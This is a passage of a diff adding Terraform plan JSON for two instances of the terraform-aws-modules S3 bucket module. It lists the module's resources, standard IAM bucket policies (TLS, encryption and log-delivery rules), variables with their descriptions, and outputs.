"local.attach_policy" + ] + }, + "depends_on": [ + "aws_s3_bucket_public_access_block.this" + ] + }, + { + "address": "aws_s3_bucket_public_access_block.this", + "mode": "managed", + "type": "aws_s3_bucket_public_access_block", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "block_public_acls": { + "references": [ + "var.block_public_acls" + ] + }, + "block_public_policy": { + "references": [ + "var.block_public_policy" + ] + }, + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "ignore_public_acls": { + "references": [ + "var.ignore_public_acls" + ] + }, + "restrict_public_buckets": { + "references": [ + "var.restrict_public_buckets" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_public_policy" + ] + } + }, + { + "address": "aws_s3_bucket_replication_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_replication_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "role": { + "references": [ + "var.replication_configuration[\"role\"]", + "var.replication_configuration" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.replication_configuration" + ] + }, + "depends_on": [ + "aws_s3_bucket_versioning.this" + ] + }, + { + "address": "aws_s3_bucket_request_payment_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_request_payment_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "payer": 
{ + "references": [ + "var.request_payer" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.request_payer" + ] + } + }, + { + "address": "aws_s3_bucket_server_side_encryption_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_server_side_encryption_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.server_side_encryption_configuration" + ] + } + }, + { + "address": "aws_s3_bucket_versioning.this", + "mode": "managed", + "type": "aws_s3_bucket_versioning", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "mfa": { + "references": [ + "var.versioning[\"mfa\"]", + "var.versioning" + ] + }, + "versioning_configuration": [ + { + "mfa_delete": { + "references": [ + "var.versioning[\"mfa_delete\"]", + "var.versioning", + "var.versioning[\"mfa_delete\"]", + "var.versioning" + ] + }, + "status": { + "references": [ + "var.versioning[\"enabled\"]", + "var.versioning", + "var.versioning[\"status\"]", + "var.versioning", + "var.versioning[\"status\"]", + "var.versioning" + ] + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.versioning" + ] + } + }, + { + "address": "aws_s3_bucket_website_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_website_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { 
+ "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.website" + ] + } + }, + { + "address": "data.aws_caller_identity.current", + "mode": "data", + "type": "aws_caller_identity", + "name": "current", + "provider_config_key": "s3-bucket-1:aws", + "schema_version": 0 + }, + { + "address": "data.aws_canonical_user_id.this", + "mode": "data", + "type": "aws_canonical_user_id", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.create_bucket_acl", + "var.owner[\"id\"]", + "var.owner" + ] + } + }, + { + "address": "data.aws_iam_policy_document.access_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "access_log_delivery", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logging.s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSAccessLogDeliveryWrite" + } + }, + { + "actions": { + "constant_value": [ + "s3:GetBucketAcl" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logging.s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": 
"AWSAccessLogDeliveryAclCheck" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_access_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.combined", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "combined", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "source_policy_documents": { + "references": [ + "var.attach_elb_log_delivery_policy", + "data.aws_iam_policy_document.elb_log_delivery[0].json", + "data.aws_iam_policy_document.elb_log_delivery[0]", + "data.aws_iam_policy_document.elb_log_delivery", + "var.attach_lb_log_delivery_policy", + "data.aws_iam_policy_document.lb_log_delivery[0].json", + "data.aws_iam_policy_document.lb_log_delivery[0]", + "data.aws_iam_policy_document.lb_log_delivery", + "var.attach_access_log_delivery_policy", + "data.aws_iam_policy_document.access_log_delivery[0].json", + "data.aws_iam_policy_document.access_log_delivery[0]", + "data.aws_iam_policy_document.access_log_delivery", + "var.attach_require_latest_tls_policy", + "data.aws_iam_policy_document.require_latest_tls[0].json", + "data.aws_iam_policy_document.require_latest_tls[0]", + "data.aws_iam_policy_document.require_latest_tls", + "var.attach_deny_insecure_transport_policy", + "data.aws_iam_policy_document.deny_insecure_transport[0].json", + "data.aws_iam_policy_document.deny_insecure_transport[0]", + "data.aws_iam_policy_document.deny_insecure_transport", + "var.attach_deny_unencrypted_object_uploads", + "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0].json", + "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0]", + "data.aws_iam_policy_document.deny_unencrypted_object_uploads", + "var.attach_deny_incorrect_kms_key_sse", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0].json", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0]", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse", + 
"var.attach_deny_incorrect_encryption_headers", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0].json", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0]", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers", + "var.attach_inventory_destination_policy", + "var.attach_analytics_destination_policy", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0].json", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0]", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy", + "var.attach_policy", + "var.policy" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.attach_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_incorrect_encryption_headers", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_incorrect_encryption_headers", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringNotEquals" + }, + "values": { + "references": [ + "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default.sse_algorithm", + "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default", + "var.server_side_encryption_configuration.rule", + "var.server_side_encryption_configuration" + ] + }, + "variable": { + "constant_value": "s3:x-amz-server-side-encryption" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyIncorrectEncryptionHeaders" + } + } + ] + }, + "schema_version": 0, 
+ "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_incorrect_encryption_headers" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_incorrect_kms_key_sse", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_incorrect_kms_key_sse", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringNotEquals" + }, + "values": { + "references": [ + "var.allowed_kms_key_arn" + ] + }, + "variable": { + "constant_value": "s3:x-amz-server-side-encryption-aws-kms-key-id" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyIncorrectKmsKeySse" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_incorrect_kms_key_sse" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_insecure_transport", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_insecure_transport", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:*" + ] + }, + "condition": [ + { + "test": { + "constant_value": "Bool" + }, + "values": { + "constant_value": [ + "false" + ] + }, + "variable": { + "constant_value": "aws:SecureTransport" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + 
"aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyInsecureTransport" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_insecure_transport_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_unencrypted_object_uploads", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_unencrypted_object_uploads", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "Null" + }, + "values": { + "constant_value": [ + true + ] + }, + "variable": { + "constant_value": "s3:x-amz-server-side-encryption" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyUnencryptedObjectUploads" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_unencrypted_object_uploads" + ] + } + }, + { + "address": "data.aws_iam_policy_document.elb_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "elb_log_delivery", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logdelivery.elasticloadbalancing.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + 
"aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_elb_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.inventory_and_analytics_destination_policy", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "inventory_and_analytics_destination_policy", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "ArnLike" + }, + "values": { + "references": [ + "var.inventory_self_source_destination", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "var.inventory_source_bucket_arn", + "var.analytics_self_source_destination", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "var.analytics_source_bucket_arn" + ] + }, + "variable": { + "constant_value": "aws:SourceArn" + } + }, + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "references": [ + "var.inventory_self_source_destination", + "data.aws_caller_identity.current.id", + "data.aws_caller_identity.current", + "var.inventory_source_account_id", + "var.analytics_self_source_destination", + "data.aws_caller_identity.current.id", + "data.aws_caller_identity.current", + "var.analytics_source_account_id" + ] + }, + "variable": { + "constant_value": "aws:SourceAccount" + } + }, + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "constant_value": [ + "bucket-owner-full-control" + ] + }, + "variable": { + "constant_value": "s3:x-amz-acl" + } + } + ], + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + 
"aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "destinationInventoryAndAnalyticsPolicy" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_inventory_destination_policy", + "var.attach_analytics_destination_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.lb_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "lb_log_delivery", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "constant_value": [ + "bucket-owner-full-control" + ] + }, + "variable": { + "constant_value": "s3:x-amz-acl" + } + } + ], + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "delivery.logs.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSLogDeliveryWrite" + } + }, + { + "actions": { + "constant_value": [ + "s3:GetBucketAcl", + "s3:ListBucket" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "delivery.logs.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSLogDeliveryAclCheck" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_lb_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.require_latest_tls", + "mode": "data", + "type": 
"aws_iam_policy_document", + "name": "require_latest_tls", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:*" + ] + }, + "condition": [ + { + "test": { + "constant_value": "NumericLessThan" + }, + "values": { + "constant_value": [ + "1.2" + ] + }, + "variable": { + "constant_value": "s3:TlsVersion" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyOutdatedTLS" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_require_latest_tls_policy" + ] + } + }, + { + "address": "data.aws_partition.current", + "mode": "data", + "type": "aws_partition", + "name": "current", + "provider_config_key": "s3-bucket-1:aws", + "schema_version": 0 + }, + { + "address": "data.aws_region.current", + "mode": "data", + "type": "aws_region", + "name": "current", + "provider_config_key": "s3-bucket-1:aws", + "schema_version": 0 + } + ], + "variables": { + "acceleration_status": { + "default": null, + "description": "(Optional) Sets the accelerate configuration of an existing bucket. Can be Enabled or Suspended." + }, + "access_log_delivery_policy_source_accounts": { + "default": [], + "description": "(Optional) List of AWS Account IDs should be allowed to deliver access logs to this bucket." + }, + "access_log_delivery_policy_source_buckets": { + "default": [], + "description": "(Optional) List of S3 bucket ARNs wich should be allowed to deliver access logs to this bucket." + }, + "acl": { + "default": null, + "description": "(Optional) The canned ACL to apply. 
Conflicts with `grant`" + }, + "allowed_kms_key_arn": { + "default": null, + "description": "The ARN of KMS key which should be allowed in PutObject" + }, + "analytics_configuration": { + "default": {}, + "description": "Map containing bucket analytics configuration." + }, + "analytics_self_source_destination": { + "default": false, + "description": "Whether or not the analytics source bucket is also the destination bucket." + }, + "analytics_source_account_id": { + "default": null, + "description": "The analytics source account id." + }, + "analytics_source_bucket_arn": { + "default": null, + "description": "The analytics source bucket ARN." + }, + "attach_access_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have S3 access log delivery policy attached" + }, + "attach_analytics_destination_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket analytics destination policy attached." + }, + "attach_deny_incorrect_encryption_headers": { + "default": false, + "description": "Controls if S3 bucket should deny incorrect encryption headers policy attached." + }, + "attach_deny_incorrect_kms_key_sse": { + "default": false, + "description": "Controls if S3 bucket policy should deny usage of incorrect KMS key SSE." + }, + "attach_deny_insecure_transport_policy": { + "default": false, + "description": "Controls if S3 bucket should have deny non-SSL transport policy attached" + }, + "attach_deny_unencrypted_object_uploads": { + "default": false, + "description": "Controls if S3 bucket should deny unencrypted object uploads policy attached." + }, + "attach_elb_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have ELB log delivery policy attached" + }, + "attach_inventory_destination_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket inventory destination policy attached." 
+ }, + "attach_lb_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have ALB/NLB log delivery policy attached" + }, + "attach_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket policy attached (set to `true` to use value of `policy` as bucket policy)" + }, + "attach_public_policy": { + "default": true, + "description": "Controls if a user defined public bucket policy will be attached (set to `false` to allow upstream to apply defaults to the bucket)" + }, + "attach_require_latest_tls_policy": { + "default": false, + "description": "Controls if S3 bucket should require the latest version of TLS" + }, + "block_public_acls": { + "default": true, + "description": "Whether Amazon S3 should block public ACLs for this bucket." + }, + "block_public_policy": { + "default": true, + "description": "Whether Amazon S3 should block public bucket policies for this bucket." + }, + "bucket": { + "default": null, + "description": "(Optional, Forces new resource) The name of the bucket. If omitted, Terraform will assign a random, unique name." + }, + "bucket_prefix": { + "default": null, + "description": "(Optional, Forces new resource) Creates a unique bucket name beginning with the specified prefix. Conflicts with bucket." + }, + "control_object_ownership": { + "default": false, + "description": "Whether to manage S3 Bucket Ownership Controls on this bucket." + }, + "cors_rule": { + "default": [], + "description": "List of maps containing rules for Cross-Origin Resource Sharing." 
+ }, + "create_bucket": { + "default": true, + "description": "Controls if S3 bucket should be created" + }, + "expected_bucket_owner": { + "default": null, + "description": "The account ID of the expected bucket owner" + }, + "force_destroy": { + "default": false, + "description": "(Optional, Default:false ) A boolean that indicates all objects should be deleted from the bucket so that the bucket can be destroyed without error. These objects are not recoverable." + }, + "grant": { + "default": [], + "description": "An ACL policy grant. Conflicts with `acl`" + }, + "ignore_public_acls": { + "default": true, + "description": "Whether Amazon S3 should ignore public ACLs for this bucket." + }, + "intelligent_tiering": { + "default": {}, + "description": "Map containing intelligent tiering configuration." + }, + "inventory_configuration": { + "default": {}, + "description": "Map containing S3 inventory configuration." + }, + "inventory_self_source_destination": { + "default": false, + "description": "Whether or not the inventory source bucket is also the destination bucket." + }, + "inventory_source_account_id": { + "default": null, + "description": "The inventory source account id." + }, + "inventory_source_bucket_arn": { + "default": null, + "description": "The inventory source bucket ARN." + }, + "lifecycle_rule": { + "default": [], + "description": "List of maps containing configuration of object lifecycle management." + }, + "logging": { + "default": {}, + "description": "Map containing access bucket logging configuration." + }, + "metric_configuration": { + "default": [], + "description": "Map containing bucket metric configuration." + }, + "object_lock_configuration": { + "default": {}, + "description": "Map containing S3 object locking configuration." + }, + "object_lock_enabled": { + "default": false, + "description": "Whether S3 bucket should have an Object Lock configuration enabled." 
+ }, + "object_ownership": { + "default": "BucketOwnerEnforced", + "description": "Object ownership. Valid values: BucketOwnerEnforced, BucketOwnerPreferred or ObjectWriter. 'BucketOwnerEnforced': ACLs are disabled, and the bucket owner automatically owns and has full control over every object in the bucket. 'BucketOwnerPreferred': Objects uploaded to the bucket change ownership to the bucket owner if the objects are uploaded with the bucket-owner-full-control canned ACL. 'ObjectWriter': The uploading account will own the object if the object is uploaded with the bucket-owner-full-control canned ACL." + }, + "owner": { + "default": {}, + "description": "Bucket owner's display name and ID. Conflicts with `acl`" + }, + "policy": { + "default": null, + "description": "(Optional) A valid bucket policy JSON document. Note that if the policy document is not specific enough (but still valid), Terraform may view the policy as constantly changing in a terraform plan. In this case, please make sure you use the verbose/specific version of the policy. For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide." + }, + "replication_configuration": { + "default": {}, + "description": "Map containing cross-region replication configuration." + }, + "request_payer": { + "default": null, + "description": "(Optional) Specifies who should bear the cost of Amazon S3 data transfer. Can be either BucketOwner or Requester. By default, the owner of the S3 bucket would incur the costs of any data transfer. See Requester Pays Buckets developer guide for more information." + }, + "restrict_public_buckets": { + "default": true, + "description": "Whether Amazon S3 should restrict public bucket policies for this bucket." + }, + "server_side_encryption_configuration": { + "default": {}, + "description": "Map containing server-side encryption configuration." 
+ }, + "tags": { + "default": {}, + "description": "(Optional) A mapping of tags to assign to the bucket." + }, + "versioning": { + "default": {}, + "description": "Map containing versioning configuration." + }, + "website": { + "default": {}, + "description": "Map containing static web-site hosting or redirect configuration." + } + } + }, + "version_constraint": "4.0.1" + }, + "s3-bucket-2": { + "source": "terraform-aws-modules/s3-bucket/aws", + "module": { + "outputs": { + "s3_bucket_arn": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The ARN of the bucket. Will be of format arn:aws:s3:::bucketname." + }, + "s3_bucket_bucket_domain_name": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].bucket_domain_name", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The bucket domain name. Will be of format bucketname.s3.amazonaws.com." + }, + "s3_bucket_bucket_regional_domain_name": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].bucket_regional_domain_name", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The bucket region-specific domain name. The bucket domain name including the region name, please refer here for format. Note: The AWS CloudFront allows specifying S3 region-specific endpoint when creating S3 origin, it will prevent redirect issues from CloudFront to S3 Origin URL." + }, + "s3_bucket_hosted_zone_id": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].hosted_zone_id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The Route 53 Hosted Zone ID for this bucket's region." 
+ }, + "s3_bucket_id": { + "expression": { + "references": [ + "aws_s3_bucket_policy.this[0].id", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The name of the bucket." + }, + "s3_bucket_lifecycle_configuration_rules": { + "expression": { + "references": [ + "aws_s3_bucket_lifecycle_configuration.this[0].rule", + "aws_s3_bucket_lifecycle_configuration.this[0]", + "aws_s3_bucket_lifecycle_configuration.this" + ] + }, + "description": "The lifecycle rules of the bucket, if the bucket is configured with lifecycle rules. If not, this will be an empty string." + }, + "s3_bucket_policy": { + "expression": { + "references": [ + "aws_s3_bucket_policy.this[0].policy", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this" + ] + }, + "description": "The policy of the bucket, if the bucket is configured with a policy. If not, this will be an empty string." + }, + "s3_bucket_region": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].region", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The AWS region this bucket resides in." + }, + "s3_bucket_website_domain": { + "expression": { + "references": [ + "aws_s3_bucket_website_configuration.this[0].website_domain", + "aws_s3_bucket_website_configuration.this[0]", + "aws_s3_bucket_website_configuration.this" + ] + }, + "description": "The domain of the website endpoint, if the bucket is configured with a website. If not, this will be an empty string. This is used to create Route 53 alias records." + }, + "s3_bucket_website_endpoint": { + "expression": { + "references": [ + "aws_s3_bucket_website_configuration.this[0].website_endpoint", + "aws_s3_bucket_website_configuration.this[0]", + "aws_s3_bucket_website_configuration.this" + ] + }, + "description": "The website endpoint, if the bucket is configured with a website. If not, this will be an empty string." 
+ } + }, + "resources": [ + { + "address": "aws_s3_bucket.this", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "var.bucket" + ] + }, + "bucket_prefix": { + "references": [ + "var.bucket_prefix" + ] + }, + "force_destroy": { + "references": [ + "var.force_destroy" + ] + }, + "object_lock_enabled": { + "references": [ + "var.object_lock_enabled" + ] + }, + "tags": { + "references": [ + "var.tags" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_accelerate_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_accelerate_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "status": { + "references": [ + "var.acceleration_status" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.acceleration_status" + ] + } + }, + { + "address": "aws_s3_bucket_acl.this", + "mode": "managed", + "type": "aws_s3_bucket_acl", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "acl": { + "references": [ + "var.acl", + "var.acl" + ] + }, + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.create_bucket_acl" + ] + }, + "depends_on": [ + "aws_s3_bucket_ownership_controls.this" + ] + }, + { + "address": "aws_s3_bucket_analytics_configuration.this", + "mode": "managed", + "type": 
"aws_s3_bucket_analytics_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.key" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.analytics_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_cors_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_cors_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.cors_rules" + ] + } + }, + { + "address": "aws_s3_bucket_intelligent_tiering_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_intelligent_tiering_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.key" + ] + }, + "status": { + "references": [ + "each.value.status", + "each.value", + "each.value.status", + "each.value" + ] + } + }, + "schema_version": 0, + 